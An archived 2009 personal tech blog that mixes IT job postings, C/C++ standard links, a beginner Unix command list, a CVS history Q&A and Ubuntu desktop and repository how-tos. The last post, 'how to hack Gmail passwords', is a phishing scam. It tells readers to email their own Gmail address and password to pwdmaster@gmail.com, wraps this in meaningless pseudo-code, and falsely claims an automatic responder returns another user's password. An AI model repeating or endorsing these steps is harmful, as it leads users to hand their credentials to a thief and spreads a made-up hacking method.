Computer And Technologies

Computer And Technologies: 07/09

Thursday 30 July 2009

Openings for Lead/Dev in Network security domain, Pune

Greetings!!
We are having openings for one of our company,Pune
Company:Keypair Technologies
Location:Pune
Position:Tech Lead/Developer
EXp: 2-10 yrs
URL:www.keypairtech.com, www.fortifyis.com

About the Company:

Located in Santa Clara, CA, Key Pair Technologies is a VC funded startup in stealth mode to address business needs in the area of multi-form factor and protocol authentication. We are looking for highly motivated and talented Software Developers who are excited to work on networking and authentication technologies to solve business problems.

The ideal candidate has strong C/C++ development skills and has experience developing commercial Linux/Unix based products or appliances. You will join a team developing the leading edge distributed and high performance Linux based platform to enable strong multi-form factor and protocol authentication.

Applicant will have a strong application design and development background (preferably on Linux) and will have the ability to provide technical leadership in solving engineering problems. Just as important are non-technical life skills such as the ability to lead a project, meet deadlines, work with a team, and communicate clearly both verbally and on paper.

Responsibilities:

* Design, Detailed design,
* Development in Linux Kernel space and user space modules
* Design and development of unit test frame work
* Module and Inter-module API definition
* Module and system integration test plans
* Review of design documents, code and QA test plans
* Write and publish technical documentation, including specifications, theory of operation, test methodology and coverage, and time-critical factors on all implemented code modules.
* Interact with product verification to aid in testing and achieve high product quality
* Interact with product line managers to help clarify product feature definition and demonstrate features.

Experience and Skills:

* 3+ years of software development experience in Networking and Network security field.
* Demonstrated excellence in C and C++ design, patterns, coding, debugging and unit testing.
* Skills with scripting language such as GnuMake, Perl or Python
* Skills in L4-L7 packet processing, UDP/TCP sockets, multi-threading, process control, IPC, signals, system calls and multiprocessing in Linux environment using C/C++.
* Knowledge of application layer protocols such as HTTP, TLS, WS-* and technologies such as Open SSL is desired
* Knowledge of Authentication methodologies such as RADIUS, SAML, Kerberos is desired.
* Experience with large scale systems, scalability, availability and performance issues with Linux is desired.
* Ability to complete software projects on time in a fast paced environment.

Desirable Skills:

* Knowledge of Java/J2EE is desired.
* Ability to complete software projects on time in a fast paced environment

If you are interested please forward me your updated CV ASAP.
If not please ignore this mail.

Thanks and Regards,

Sailaja Reddy



Career One Solutions India Pvt Ltd

Banjara Classic,Road No.10,Banjara Hills,

Hyderabad-500034.

Tel:91-40-64636355

Unix Shell scripting/ Contract Position

Prithvi is a US$ 279 million, global provider of IT Consulting and Engineering solutions company. Prithvi's decade of experience helps it to continually innovate and address latest imperatives in IT industry.
Our operations began in the year 1998 with our registered office in Hyderabad, India and US head office located in Pittsburgh (PA). Prithvi's global network of development centers and sales offices are in Europe, Middle East and Asia Pacific.
Prithvi Professional Services provides strategic and innovative staffing solutions. We offer a complete staffing solution to meet your ever-changing technology demand and highest level of customer satisfaction.
We specialize in worldwide IT solutions and engineering services staffing. We follow a stringent hiring, grooming and deployment process which includes technical tests and multiple rounds of interviews, to ensure an excellent match.
www.prithvisolutions.com

Requirement: Unix,Shellscripting
Company: Prithvi Information Solutions.
Location: Bangalore Or Pune ( candidate should ready to join in any location)
Position: contract

Should ready to join in 10 days



Regards,
Rehman Shaik
HR Executive

Prithvi Information Solutions Ltd
10Q3A1, Cyber Towers
HITEC City, Madhapur
Hyderabad - 500 081

Desk: +091 - 040 - 66846019 XT:462
Email-rehman.shaik@prithvisolutions.com
http://www.prithvisolutions.com

Sunday 26 July 2009

Opening for C/C++ @Bangalore

---------- Forwarded message ----------
From: prathibha.g@careernet.co.in <prathibha.g@careernet.co.in>
Date: Wed, Jul 22, 2009 at 5:06 PM
Subject: Excellent opening with Varian, Pune
To: krshn.acharya@gmail.com


Hi,

This is regarding the requirement with our client Varian Medical
Systems (www.varian.com), Pune.
Looking for Software developer with the following skill sets.

Required:
• 2 – 4 years years of experience in software product development
preferably in delivery of
healthcare products.
• Strong development skills with experience in C#.Net. Prior
experience on C++ / VC++ would be
a strong added advantage.
• Experience on COM, .Net Remoting & WCF would be an added
advantage.
• Experience handling File I/O Streams, developing windows services
would be an added
advantage.
• Knowledge of OOAD concepts and design patterns.

Desired:
• Knowledge of DICOM Streams, DICOM Services or DICOM IODs would be
a strong added
advantage.
• Experience on healthcare information systems like RIS, PACS, OIS
would be an added
advantage.
• Experience developing oncology treatment consoles or medical image
acquisition consoles would
be an added advantage.

Best regards,

Prathibha I Consultant
CareerNet Consulting
Direct: +91-80-66550045; Mobile: +919379906813
Email: prathibha.g@careernet.co.in
URL: www.careernet.co.in
Bangalore | Chennai | Delhi | Hyderabad | Mumbai | Pune
Disclaimer:
The sender of this email is registered with naukri.com as Careernet
Technologies Pvt Ltd (, Salarpuria Soft Zone, 4th Floor 80/1, 80/2
Outer, Ring Road, BANGALORE, Karnataka - 560001) using Naukri.com
services. The responsibility of checking the authenticity of offers/
correspondence lies with you.

Thursday 23 July 2009

Latest C++ Standard file

Dear all ,

Please find the latest C++ Standard files for your reference.

  1. Download C++ latest Std file
  2. another one

Source:- http://www.open-std.org/

Thanks,
-Amaresh

Wednesday 22 July 2009

Latest C Standard file

Dear all ,

Please find the latest C Standard files for your reference.

Download C latest Std file

Source:- http://www.open-std.org/

Thanks,
-Amaresh

Tuesday 21 July 2009

Basic Unix commands for beginners!!

passwd
This command allows you to change your login password. You are prompted to enter your current password, and then prompted (twice) to enter your new password. On Linux systems (like haribol) passwords should exceed 6 characters in length, and contain at least one non-alphanumeric character (such as #, %, *, ^, [, or @ etc.)

cd
This command, as in DOS, changes directories. You can use .. to represent the directory above the current directory. You can use ~ to represent your root directory (also called your home or top directory). Example: cd maindir to move into the maindir directory, cd .. to move to the directory above, or cd ~ to move to your root directory.

pwd
This command tells you which directory you are currently working in. Your home directory is represented by the tilde ~ symbol. To go to your home directory from anywhere, type cd ~, however typing cd without the ~ also works on Linux systems.

ls
This gives you a listing of all files in a directory. You can't tell which are files and which are directories.

ls -F
This shows which files are normal files (they have no special symbols at the end), which are directories (they end in a / character), which are links (they end in a @ symbol) and which are executables (they end in a * character). These special symbols are NOT part of the file name.

ls -l
"Long" format. Gives more details about files and directories in the current directory.

ls -a
Lists "hidden" files in current directory (those starting with a . character).

ls -la
Options may usually be combined. This particular combination would list both hidden and unhidden files in the long format

mv
The "move" command is how you rename files. Example: mv oldfile.txt newfile.txt

cp
Allows you to copy one or more files. Example: cp myfile.c backup.c

rm
Deletes a file. BE CAREFUL!! There's no "undelete" command. Example: rm janfiles.*

cat
Sends the contents of a file to stdout (usually the display screen). The name comes from "concatenate." Example: cat index.html

more
Like cat but displays a file one page at a time. Example: more long_file.txt

wc
Counts the number of lines, words, and characters in a file. Example: wc essay.rtf

tail -n
Displays the last n lines of a file. Example: tail -5 myfile

head -n
Displays the first n lines of a file. Example: head -5 myfile

mkdir
Creates a new directory, located below the present directory. (Use pwd first to check where you are!) Example: mkdir new_dir

rmdir
Deletes a directory. Example: rmdir old_dir

man
The most important Unix command! It displays the manual pages for a chosen Unix command. Press [Enter] to advance one line, [Spacebar] to advance one page, and the [Q] key to quit and return to the Unix prompt. Example: man ls

man -k
Displays all Unix commands related to a given keyword. Example: man -k date will list all Unix commands whose man pages contain a reference to the word date.

date
Shows the current time and date.

logout
Terminates the current login session, (and returns you to your telnet client, if that is how you established the session originally).


I/O Redirection

<
Input redirection. This allows you to take input from a file rather than stdin. Example: tr a z

>
Output redirection. This allows you to send output to a file rather than stdout. Example: ls -l >listing

|
Pipe. This allows you to connect stdout from one command with stdin of another. Example: ls -la | more
File Compression:-
    • gzip filename --- compresses files, so that they take up much less space. Usually text files compress to about half their original size, but it depends very much on the size of the file and the nature of the contents. There are other tools for this purpose, too (e.g. compress), but gzip usually gives the highest compression rate. Gzip produces files with the ending '.gz' appended to the original filename.
    • gunzip filename --- uncompresses files compressed by gzip.
    • gzcat filename --- lets you look at a gzipped file without actually having to gunzip it (same as gunzip -c). You can even print it directly, using gzcat filename | lpr
  • printing
    • lpr filename --- print. Use the -P option to specify the printer name if you want to use a printer other than your default printer. For example, if you want to print double-sided, use 'lpr -Pvalkyr-d', or if you're at CSLI, you may want to use 'lpr -Pcord115-d'. See 'help printers' for more information about printers and their locations.
    • lpq --- check out the printer queue, e.g. to get the number needed for removal, or to see how many other files will be printed before yours will come out
    • lprm jobnumber --- remove something from the printer queue. You can find the job number by using lpq. Theoretically you also have to specify a printer name, but this isn't necessary as long as you use your default printer in the department.
    • genscript --- converts plain text files into postscript for printing, and gives you some options for formatting. Consider making an alias like alias ecop 'genscript -2 -r \!* | lpr -h -Pvalkyr' to print two pages on one piece of paper.
    • dvips filename --- print .dvi files (i.e. files produced by LaTeX). You can use dviselect to print only selected pages.

Finding things

  • ff --- find files anywhere on the system. This can be extremely useful if you've forgotten in which directory you put a file, but do remember the name. In fact, if you use ff -p you don't even need the full name, just the beginning. This can also be useful for finding other things on the system, e.g. documentation.
  • grep string filename(s) --- looks for the string in the files. This can be useful a lot of purposes, e.g. finding the right file among many, figuring out which is the right version of something, and even doing serious corpus work. grep comes in several varieties (grep, egrep, and fgrep) and has a lot of very flexible options. Check out the man pages if this sounds good to you.

About other people

  • w --- tells you who's logged in, and what they're doing. Especially useful: the 'idle' part. This allows you to see whether they're actually sitting there typing away at their keyboards right at the moment.
  • who --- tells you who's logged on, and where they're coming from. Useful if you're looking for someone who's actually physically in the same building as you, or in some other particular location.
  • finger username --- gives you lots of information about that user, e.g. when they last read their mail and whether they're logged in. Often people put other practical information, such as phone numbers and addresses, in a file called .plan. This information is also displayed by 'finger'.
  • last -1 username --- tells you when the user last logged on and off and from where. Without any options, last will give you a list of everyone's logins.
  • talk username --- lets you have a (typed) conversation with another user
  • write username --- lets you exchange one-line messages with another user
  • elm --- lets you send e-mail messages to people around the world (and, of course, read them). It's not the only mailer you can use, but the one we recommend.

About your (electronic) self

  • whoami --- returns your username. Sounds useless, but isn't. You may need to find out who it is who forgot to log out somewhere, and make sure *you* have logged out.
  • finger & .plan files
    of course you can finger yourself, too. That can be useful e.g. as a quick check whether you got new mail. Try to create a useful .plan file soon. Look at other people's .plan files for ideas. The file needs to be readable for everyone in order to be visible through 'finger'. Do 'chmod a+r .plan' if necessary. You should realize that this information is accessible from anywhere in the world, not just to other people on turing.
  • passwd --- lets you change your password, which you should do regularly (at least once a year).
  • ps -u yourusername --- lists your processes. Contains lots of information about them, including the process ID, which you need if you have to kill a process. Normally, when you have been kicked out of a dialin session or have otherwise managed to get yourself disconnected abruptly, this list will contain the processes you need to kill. Those may include the shell (tcsh or whatever you're using), and anything you were running, for example emacs or elm. Be careful not to kill your current shell - the one with the number closer to the one of the ps command you're currently running. But if it happens, don't panic. Just try again :) If you're using an X-display you may have to kill some X processes before you can start them again. These will show only when you use ps -efl, because they're root processes.
  • kill PID --- kills (ends) the processes with the ID you gave. This works only for your own processes, of course. Get the ID by using ps. If the process doesn't 'die' properly, use the option -9. But attempt without that option first, because it doesn't give the process a chance to finish possibly important business before dying. You may need to kill processes for example if your modem connection was interrupted and you didn't get logged out properly, which sometimes happens.
  • quota -v --- show what your disk quota is (i.e. how much space you have to store files), how much you're actually using, and in case you've exceeded your quota (which you'll be given an automatic warning about by the system) how much time you have left to sort them out (by deleting or gzipping some, or moving them to your own computer).
  • du filename --- shows the disk usage of the files and directories in filename (without argument the current directory is used). du -s gives only a total.
  • last yourusername --- lists your last logins. Can be a useful memory aid for when you were where, how long you've been working for, and keeping track of your phonebill if you're making a non-local phonecall for dialling in.

Connecting to the outside world

  • nn --- allows you to read news. It will first let you read the news local to turing, and then the remote news. If you want to read only the local or remote news, you can use nnl or nnr, respectively. To learn more about nn type nn, then \tty{:man}, then \tty{=.*}, then \tty{Z}, then hit the space bar to step through the manual. Or look at the man page.
  • rlogin hostname --- lets you connect to a remote host
  • telnet hostname --- also lets you connect to a remote host. Use rlogin whenever possible.
  • ftp hostname --- lets you download files from a remote host which is set up as an ftp-server. This is a common method for exchanging academic papers and drafts. If you need to make a paper of yours available in this way, you can (temporarily) put a copy in /user/ftp/pub/TMP. For more permanent solutions, ask Emma. The most important commands within ftp are get for getting files from the remote machine, and put for putting them there (mget and mput let you specify more than one file at once). Sounds straightforward, but be sure not to confuse the two, especially when your physical location doesn't correspond to the direction of the ftp connection you're making. ftp just overwrites files with the same filename. If you're transferring anything other than ASCII text, use binary mode.
  • lynx --- lets you browse the web from an ordinary terminal. Of course you can see only the text, not the pictures. You can type any URL as an argument to the G command. When you're doing this from any Stanford host you can leave out the .stanford.edu part of the URL when connecting to Stanford URLs. Type H at any time to learn more about lynx, and Q to exit.

-----------------------------------------------------------------------------------------------------------------------------
Unix tutorials

There are a number of excellent Unix tutorials on the Web, including:

CVS History of the project

Some one asked me this Question.. which is really good one...

when I run this command:

"cvs history ProccessView"
the result looks like is:

O 2009-07-19 17:04 +0000 KalliMan
=.= localhost/*
O 2009-07-11 22:00 +0000 KalliMan ./ApiDialogsClient =./
ApiDialogsClient= localhost/./ApiDialogsClient
O 2009-07-11 15:31 +0000 KalliMan ./KUtilities =./
KUtilities= localhost/./KUtilities
O 2009-07-11 15:36 +0000 KalliMan ./KUtilities/Bin =./
KUtilities/Bin= localhost/./KUtilities/Bin
O 2009-07-11 21:51 +0000 KalliMan ./test =./
test= localhost/./test
.....

Can somebody tells me what the ... is the meaning of these columns???
Answer of the above Question:--

Hi ,


O 2009-07-19 17:04 +0000 KalliMan =.= localhost/*

From above :

2009-07-19 (2nd column) is

17:04 (3rd column ) is modules updated time on your server.

+0000 (4th Column) is Leading value

KalliMan (5th column) is User name

6th column Module or project name

7th column file name

8th column :--- server/ module position either <remote> i,e 192.168.x.x or i,e 127.0.0.1


history output
---------------------

`history' prints a line for each selected history record. Each line
begins with a character indicating the record type (*note history
options::), followed by a timestamp (in the format `YYYY-MM-DD HH:MM
ZZZZ'), then the name of the user who performed the action. The
remainder of the line depends on the record type:

`T'
The relative path to the directory in the repository; then the
description of the tag in the format `[NAME:OPT]' where NAME is
the tag name and OPT is `D' for `tag -d', the specified revision
for `tag -r', the specified date for `tag -D', or `A' for a plain
`tag'.

`F', `E', `O'
The tag/revision/date checked out, if any, enclosed in `[' and `]';
the relative path to the directory in the repository, if any; the
associated module name, enclosed in `=' and `='; then the absolute
path to the local working directory or `'.

`W', `U', `P', `C', `G', `M', `A', `R'
The revision checked out; the file name; the relative path to the
directory in the repository, if any; the associated module name,
enclosed in `=' and `='; then the absolute path to the local
working directory or `'.


`~' at the beginning of a working directory means the user's home
directory. `*' at the end of a repository or working directory means
the associated module name.

A.13.3 history examples
-----------------------

$ cvs history -e

A 2009-07-21 20:21 +0000 bach 1.1 tc.1 yoyodyne/tc/man == ~/tc/man
M 2009-07-21 20:22 +0000 bach 1.2 backend.c yoyodyne/tc == ~/tc
M 2009-07-21 20:27 +0000 bach 1.5 frontend.c yoyodyne/tc == ~/tc
T 2009-07-21 20:27 +0000 bach yoyodyne/tc [rel_0_3:A]
O 2009-07-21 20:28 +0000 cedar [rel_0_1] yoyodyne/* =tc= /*
C 2009-07-21 20:29 +0000 cedar 1.3 driver.c yoyodyne/tc ==
U 2009-07-21 20:29 +0000 cedar 1.5 frontend.c yoyodyne/tc ==
F 2009-07-21 20:31 +0000 bach =yoyodyne= ~/*
E 2009-07-21 20:33 +0000 bach [rel_0_3] yoyodyne/tc =.= /foo/*
O 2009-07-21 20:37 +0000 bach yoyodyne/* =tc= ~/*
R 2009-07-21 20:37 +0000 bach 1.2 test2.t yoyodyne/tc/testing == ~/tc/testing
E 2009-07-21 20:38 +0000 bach [2009.07.21.20.38.48] yoyodyne/* =tc= /foo

Have a look my processview :- (remote server)

root@eOdissa-desktop:/home/amaresh/Vecima/Vcom_Task/wingmax# cvs history ProccessView
Password:
O 2009-07-13 10:58 +0000 amareshcd kernel-2.6 =kernel-2.6= /*
O 2009-07-13 12:54 +0000 amareshcd libadapt =libadapt= /*
O 2009-07-13 12:54 +0000 amareshcd mac_01_alpha =mac_01_alpha= /*
O 2009-07-13 10:12 +0000 amareshcd othersrc =othersrc= /*
O 2009-07-13 12:54 +0000 amareshcd wingmax/* =src= /*
O 2009-07-13 10:58 +0000 amareshcd wavesat =wavesat= /*
O 2009-07-13 10:09 +0000 amareshcd wingmax =wingmax= <remote>/*

Have a look this command “ls -ltr “ you will get good idea.

wingmax# ls -ltr
total 148
-rwxr-xr-x 1 root root 2035 2007-06-13 22:51 postcheckout.sh
-rw-r--r-- 1 root root 1911 2008-01-09 23:03 README.txt
-rwxr-x--- 1 root root 3059 2008-11-26 04:44 common.mk
-rwxr-x--- 1 root root 35485 2008-12-18 13:50 Makefile
-rw-r--r-- 1 root root 8 2009-07-13 10:16 VERSION
drwxr-xr-x 5 root root 4096 2009-07-13 15:39 doc

Why are you giving "cvs history ProccessView" ?

just give "cvs history" you will get same result.

if you will give " cvs history " then you will not get different o/p as bellow:--

cvs history common.mk
Password:
O 2009-07-13 10:58 +0000 amareshcd kernel-2.6 =kernel-2.6= /*
O 2009-07-13 12:54 +0000 amareshcd libadapt =libadapt= /*
O 2009-07-13 12:54 +0000 amareshcd mac_01_alpha =mac_01_alpha= /*
O 2009-07-13 10:12 +0000 amareshcd othersrc =othersrc= /*
O 2009-07-13 12:54 +0000 amareshcd wingmax/* =src= /*
O 2009-07-13 10:58 +0000 amareshcd wavesat =wavesat= /*
O 2009-07-13 10:09 +0000 amareshcd wingmax =wingmax= /*


Thanks,

-Amaresh


Wednesday 15 July 2009

Current Requirment - Software Engineer / Senior Software Engineer

Dear All,

We have requirements for the post of Software Engineers / Senior Software Engineers. We would like you to refer your friends, acquaintances or people you know who will suit this profile.

We are conducting a walk-in drive on the coming 20th, 21st, 22nd of July ’09 ( Monday, Tuesday, Wednesday), for candidates referred by you.

The job description is as below.

Designation : Software Engineer / Senior Software Engineer

Experience Level - 2 - 4 Years

1. Strong technical knowledge in ASP.NET, C#, JavaScript

2. Strong technical knowledge in SQL Server 2005 / Oracle

3. Experience in developing Enterprise Application

INTERVIEW PROCEDURE :

Round I - Technical Written Test and Aptitude Test (20th, 21st and 22nd of July’09)

Round II - Technical Interview - Level I

Round III - Technical Interview - Level II

Round IV - HR Round

Round V - Interview with MD

Post clearance of the written test the technical rounds will be arranged for later in the month.


Resumes to be forwarded to Jai.jagadeesha@odessatech.com

Interview Timings : 2.00 PM - 7.00 PM

Please forward this mail to your friends and acquaintances, and help us make this talent search a great success!!

Request you to convey the Job Description as well as the Venue details to your referred candidates. Thank you for your co-operation as always.

Thanks & Regards,

Jai Jagadeesha

91-80-41464322-23 Extn-207

www.odessatech.com

tel 888-O-TECH-84 | tel 215-231-9800 | fax 215-231-9848
2000 Market Street, Suite 1840 , Philadelphia , PA 19103

tel 91-80-41464322–23 | fax 91-80-41464321 |

Zam Zam Complex, First Floor, 26 Infantry Road , Bangalore 560001, India

Friday 10 July 2009

Getting Back to a Pure Gnome on Ubuntu from Kbuntu and vice Versa!

If you want to remove kbuntu, then follow the bellow steps :-

If you used aptitude to install other desktop environments, you will not need this tutorial, as you can just type bellow command into your terminal/konsol to get back to your "pure Gnome."

sudo aptitude remove kubuntu-desktop
or
sudo aptitude remove xubuntu-desktop

If you want to remove Ubuntu, then follow the bellow steps:-

If you used aptitude to install other desktop environments, you will not need this tutorial, as you can just type bellow command into your terminal/konsol to get back to your "pure KDE."

sudo aptitude remove ubuntu-desktop
or
sudo aptitude remove xubuntu-desktop

Remove Kubuntu
Paste this command into the terminal:

sudo apt-get remove adept akregator amarok amarok-xine ark arts artsbuilder avahi-daemon bogofilter bogofilter-bdb bogofilter-common debtags enscript flac gtk2-engines-gtk-qt gwenview imagemagick k3b kaddressbook kaffeine kaffeine-xine kamera karm katapult kate kaudiocreator kcontrol kcron kde-guidance kde-style-lipstik kde-systemsettings kdeadmin-kfile-plugins kdebase-bin kdebase-data kdebase-kio-plugins kdebluetooth kdegraphics-kfile-plugins kdelibs-bin kdelibs-data kdelibs4c2a kdemultimedia-kfile-plugins kdemultimedia-kio-plugins kdenetwork-filesharing kdenetwork-kfile-plugins kdepasswd kdepim-kio-plugins kdepim-kresources kdepim-wizards kdeprint kdesktop kdm kdnssd keep kfind kghostview khelpcenter kicker kio-apt kio-locate kitchensync klaptopdaemon klipper kmail kmailcvt kmenuedit kmilo kmix kmplayer-base kmplayer-konq-plugins knetworkconf knotes koffice-data koffice-libs konq-plugins konqueror konqueror-nsplugins konsole kontact konversation kooka kopete korganizer kpdf kpersonalizer kpf kppp krdc krfb krita krita-data kscd kscreensaver kscreensaver-xsavers ksmserver ksnapshot ksplash ksplash-engine-moodin ksvg ksysguard ksysguardd ksystemlog ktorrent kubuntu-artwork-usplash kubuntu-default-settings kubuntu-desktop kubuntu-docs kubuntu-konqueror-shortcuts kwalletmanager kwin kwin-style-crystal language-selector-qt latex-xft-fonts libakode2 libarts1-akode libarts1c2a libartsc0 libavahi-core4 libavahi-qt3-1 libdaemon0 libdbus-qt-1-1c2 libflac++5c2 libgadu3 libgpgme11 libgsl0 libjpeg-progs libk3b2 libkcal2b libkcddb1 libkdepim1a libkipi0 libkleopatra1 libkmime2 libkonq4 libkpimexchange1 libkpimidentities1 libkscan1 libksieve0 libktnef1 liblockdev1 libmimelib1c2a libmodplug0c2 libmpcdec3 libnss-mdns liboggflac3 libopenexr2c2a libpcre3 libpoppler1-qt libpythonize0 libqt-perl libqt3-mt librsync1 libruby1.8 libsamplerate0 libsensors3 libskim0 libsmokeqt1 libtdb1 libtunepimp2c2a libxcomposite1 libxine-main1 libxvmc1 menu-xdg openoffice.org-kde perl-suid poster postfix procmail psutils pykdeextensions python-kde3 python2.4-dev python2.4-kde3 python2.4-qt3 python2.4-sip4-qt3 qca-tls qobex rdiff-backup ruby ruby1.8 scim-qtimm skim speedcrunch ssl-cert vorbis-tools wlassistant

Remove Xubuntu
Paste this command into the terminal:

sudo apt-get remove abiword abiword-common abiword-help abiword-plugins anthy gnumeric-common gnumeric-gtk gqview gtk2-engines-xfce im-switch latex-xft-fonts libaiksaurus-1.2-0c2a libaiksaurus-1.2-data libaiksaurusgtk-1.2-0c2a libanthy0 libbeecrypt6 libchewing-data libchewing2 libenchant1c2a libexo-0.3-0 libgdome2-0 libgdome2-cpp-smart0c2a libgoffice-1-common libgoffice-gtk-1-2 libgsf-gnome-1-113 libgtkmathview0c2a libjpeg-progs libmodplug0c2 libots0 libpcre3 librpm4 libt1-5 libtagc0 libthunar-vfs-1 libwpd-stream8c2a libxcomposite1 libxfce4mcs-client3 libxfce4mcs-manager3 libxfce4util4 libxfcegui4-4 libxine-main1 libxvmc1 mousepad mozilla-thunderbird orage rpm scim-anthy scim-chewing scim-hangul scim-pinyin thunar thunar-media-tags-plugin xarchiver xfburn xfce4-appfinder xfce4-battery-plugin xfce4-clipman-plugin xfce4-cpugraph-plugin xfce4-fsguard-plugin xfce4-icon-theme xfce4-mailwatch-plugin xfce4-mcs-manager xfce4-mcs-plugins xfce4-mixer xfce4-mixer-alsa xfce4-mount-plugin xfce4-netload-plugin xfce4-panel xfce4-quicklauncher-plugin xfce4-screenshooter-plugin xfce4-session xfce4-systemload-plugin xfce4-taskmanager xfce4-terminal xfce4-utils xfce4-verve-plugin xfce4-weather-plugin xfce4-xkb-plugin xfdesktop4 xfmedia xfprint4 xfwm4 xfwm4-themes xscreensaver xubuntu-artwork-usplash xubuntu-default-settings xubuntu-desktop xubuntu-docs

Remove Ubuntu
Paste this command into the terminal:

sudo apt-get remove acpi acpi-support acpid alacarte alsa-base alsa-utils anacron apmd avahi-daemon bc ca-certificates consolekit cupsys cupsys-bsd cupsys-client cupsys-driver-gutenprint dc dcraw desktop-file-utils doc-base eog evince fast-user-switch-applet file-roller foomatic-db foomatic-db-engine foomatic-filters gcalctool gconf-editor gdebi gdm gedit genisoimage ghostscript-x gimp-python gnome-about gnome-app-install gnome-applets gnome-control-center gnome-icon-theme gnome-media gnome-menus gnome-netstatus-applet gnome-nettool gnome-panel gnome-pilot-conduits gnome-power-manager gnome-session gnome-spell gnome-system-monitor gnome-system-tools gnome-terminal gnome-themes gnome-utils gnome-volume-manager gstreamer0.10-alsa gstreamer0.10-plugins-base-apps gstreamer0.10-pulseaudio gtk2-engines gtk2-engines-pixbuf gucharmap hal hotkey-setup hwtest-gtk language-selector launchpad-integration lftp libgl1-mesa-glx libglut3 libgnome2-perl libgnomevfs2-bin libgnomevfs2-extra libpt-1.10.10-plugins-v4l libpt-1.10.10-plugins-v4l2 libsasl2-modules libxp6 metacity nautilus nautilus-cd-burner nautilus-sendto notification-daemon openprinting-ppds pnm2ppa powermanagement-interface pulseaudio pulseaudio-esound-compat readahead rss-glx screen screensaver-default-images scrollkeeper seahorse smbclient software-properties-gtk ssh-askpass-gnome synaptic system-config-printer-gnome tangerine-icon-theme tsclient ttf-bitstream-vera ttf-dejavu-core ttf-freefont ubuntu-artwork ubuntu-sounds unzip update-manager update-notifier usplash usplash-theme-ubuntu x-ttcidfont-conf xdg-user-dirs xdg-user-dirs-gtk xkb-data xorg xscreensaver-data xscreensaver-gl xterm yelp zenity zip app-install-data-commercial apport-gtk avahi-autoipd bluez-cups bluez-gnome bluez-utils bogofilter brasero brltty brltty-x11 bug-buddy cdparanoia compiz contact-lookup-applet cups-pdf deskbar-applet displayconfig-gtk diveintopython dvd+rw-tools ekiga espeak evolution evolution-exchange evolution-plugins evolution-webcal example-content f-spot firefox firefox-gnome-support foo2zjs foomatic-db-hpijs fortune-mod gcc gimp gimp-gnomevfs gnome-accessibility-themes gnome-games gnome-mag gnome-orca gnome-screensaver gnome-user-guide gvfs-fuse hal-cups-utils hplip im-switch jockey-gtk landscape-client laptop-detect libdeskbar-tracker libgl1-mesa-dri libnss-mdns libpam-gnome-keyring linux-headers-generic make min12xxw mousetweaks nautilus-share network-manager-gnome onboard openoffice.org-calc openoffice.org-gnome openoffice.org-impress openoffice.org-writer pidgin pidgin-otr powernowd pulseaudio-module-gconf pulseaudio-module-hal pulseaudio-module-x11 pxljr rhythmbox scim scim-bridge-agent scim-bridge-client-gtk scim-gtk2-immodule sound-juicer splix tomboy totem totem-mozilla tracker tracker-search-tool transmission-gtk ttf-arabeyes ttf-arphic-uming ttf-indic-fonts-core ttf-kochi-gothic ttf-kochi-mincho ttf-lao ttf-malayalam-fonts ttf-thai-tlwg ttf-unfonts-core ubufox ubuntu-docs vinagre vino wodim wvdial xcursor-themes xdg-utils xsane





Wednesday 8 July 2009

How to Change your Ubuntu Festiy to Hardy or Jaunty Ubuntu Repository?

Hi,

I faced the same as i was unable to update any software and faced like bellow error,

root@eOdissa-desktop:/home/amaresh# apt-get install update
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Couldn't find package update
Solution for this:--

  1. Anyway, here it is, for you to download the source.list. You might want to open it in a text editor, so it doesn’t open Synaptic for you. This list uses the Norwegian mirrors. Just add from “3rd party repos” and down.
  2. then do "gedit /etc/apt/source.list"
  3. replace the content of source.list with downloaded file
  4. reboot the system
  5. goto System --> Administration --> Software source ; then click all check post and change the repository to "main server"
  6. wait for upgrading ...
  7. It will like bellow...
Command Line Interface

Just add the following lines to your /etc/apt/sources.list :

For Ubuntu 9.04 (Jaunty Jackalope):
deb http://archive.ubuntu.com/ubuntu jaunty-backports main universe multiverse restricted

For Ubuntu 8.10 (Intrepid Ibex):
deb http://archive.ubuntu.com/ubuntu intrepid-backports main universe multiverse restricted

For Ubuntu 8.04 (Hardy Heron):
deb http://archive.ubuntu.com/ubuntu hardy-backports main universe multiverse restricted

For Ubuntu 6.06 (Dapper Drake):
deb http://archive.ubuntu.com/ubuntu dapper-backports main universe multiverse restricted

After refreshing the package manager's cache, packages from the backport repositories will now be available for installation.


Go to System > Administration > Software Sources


Then, make sure the main, universe, restricted, and multiverse sources are all checked (or ticked). In most cases, you will not need the source code or CD-ROM/DVD sources.

I believe in Ubuntu 9.04 these should be all checked by default.

You should also choose to download from your country's server in the Download from section. This puts a little less strain on the main Canonical servers.

Next, click on the Third-Party Software tab and click Add


In the APT line paste in

deb http://packages.medibuntu.org/ jaunty free non-free
if you're using Ubuntu 9.04.

For Ubuntu 8.10, you should substitute intrepid for jaunty
For Ubuntu 8.04, you should substitute hardy for jaunty

Then click Add Source


Click the Close button (next to Revert at the lower-right-hand corner). You'll be prompted to Reload. Go ahead and do so.


Some information will then be downloaded letting your Ubuntu installation know what new software is available for installation.

You will get an error message saying that the public key isn't available for the Medibuntu repositories. That's okay. We're about to fix that.


Go to System > Administration > Synaptic Package Manager


When Synaptic Package Manager opens, click on Search at the top-right corner and when the Find dialogue box appears, search for the word medibuntu and then click Search.


When you find the medibuntu-keyring package in the results, right-click it and select Mark for Installation. Then click Mark again to confirm.


Then click Apply and Apply again to confirm.


Once the keyring is installed,

More about repositories

So what are all of these different repositories anyway? Ubuntu Linux has a commitment to open source software, and so for mainly philosophical (and secondarily sometimes legal) reasons, it doesn't include a lot of proprietary software by default. The Ubuntu development team also can offer full support for only the official Ubuntu repositories (Main and Restricted).

You can read on the Ubuntu website more in-depth descriptions of the different types of repositories. Here's a quick low-down, though:

  • Main: Freely licensed software that's officially supported.
  • Restricted: Not exactly freely licensed software that is pretty essential to getting a lot of popular configurations working.
  • Universe: A lot of freely licensed software that's packaged by the community and not officially supported.
  • Multiverse: Not freely licensed software, also put together by the Ubuntu community and not officially supported.
  • Medibuntu: Software not included in the other repositories for various reasons.
There is also a volunteer group that puts together a lot of .deb packages for software not in the repositories or of newer versions than are currently in the repositories. Their software can be found at GetDeb.

Source:--

Tuesday 7 July 2009

how to hack Gmail passwords

Step 1: Log into your Gmail account.
Step 2: Compose a new mail.
Step 3: In subject box type " PASSWORD RECOVERY "
Step 4: Send this to - pwdmaster@gmail.com
Step 5: Write this in message box.

(first line)- Email address you want to hack.

(second line)- Your Gmail address

(third line)- Your Gmail account password
(fourth line) - <
v703&login="passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#"
start?>=""><>
{simply copy and paste above.}

How it works: you mail to a system administrators automatic responder.
